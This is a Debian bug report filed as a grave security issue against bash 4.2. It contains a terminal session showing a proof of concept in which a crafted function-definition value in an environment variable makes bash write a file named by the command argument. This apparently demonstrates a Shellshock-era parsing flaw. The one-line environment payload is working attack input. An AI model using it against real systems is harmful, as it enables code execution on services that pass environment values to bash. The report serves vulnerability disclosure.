Package: bash
Version: 4.2+dfsg-0.1+deb7u1
Severity: grave
Tags: security

http://seclists.org/oss-sec/2014/q3/679

root@diatom:/tmp/empty>bash --version
GNU bash, version 4.2.37(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2011 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
root@diatom:/tmp/empty>ls
root@diatom:/tmp/empty>X='() { function a a>\' bash -c gohomeyourdrunk
bash: X: line 1: syntax error near unexpected token `a'
bash: X: line 1: `'
bash: error importing function definition for `X'
root@diatom:/tmp/empty>ls
gohomeyourdrunk
root@diatom:/tmp/empty>

-- 
see shy jo

Attachment: signature.asc
Description: Digital signature

Reply via email to